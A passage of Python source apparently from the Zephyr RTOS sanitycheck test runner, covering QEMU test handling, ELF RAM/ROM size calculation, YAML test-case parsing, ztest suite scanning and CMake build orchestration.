except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case, kill the QEMU process directly (SIGKILL) and let
# sanitycheck judge the test result from the console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified; if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
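# --- Illustrative sketch (not part of the original tool) ---------------------
# SanityConfigParser.__init__() only stores its arguments, so _cast_value()
# can be exercised directly.  Type strings such as "list:str" or "set:int"
# split the value on whitespace and convert each element.  The file name and
# values below are made up; the helper is never called.
def _cast_value_sketch():
    scp = SanityConfigParser("dummy.yaml", None)
    assert scp._cast_value("60", "int") == 60
    assert scp._cast_value("a b c", "list:str") == ["a", "b", "c"]
    assert scp._cast_value("1 2 2", "set:int") == {1, 2}
    return scp
# ------------------------------------------------------------------------------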
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponding to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
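# Illustrative example (not from the original sources): given a test source
# containing
#     ztest_test_suite(mutex_complex,
#         ztest_unit_test(test_mutex_lock),
#         ztest_user_unit_test(test_mutex_unlock));
#     ztest_run_test_suite(mutex_complex);
# scan_file() returns (["mutex_lock", "mutex_unlock"], None): each
# ztest_*unit_test() argument between the suite definition and
# ztest_run_test_suite() is captured by stc_regex and its "test_" prefix
# stripped; a warning is produced only for #ifdef/#endif inside the suite or
# for names that do not start with "test_".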
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on Windows; running is still a work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
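# Summary of the decision above (added for clarity): the instance is run
# (not just built) only when it is runnable -- a unit test, a native
# platform, an nsim/renode/qemu simulation with the simulator binary
# available, or device testing -- and the harness allows it: 'console' and
# 'ztest' harnesses run (provided any configured fixture was supplied on
# the command line), while other harnesses force build-only.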
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
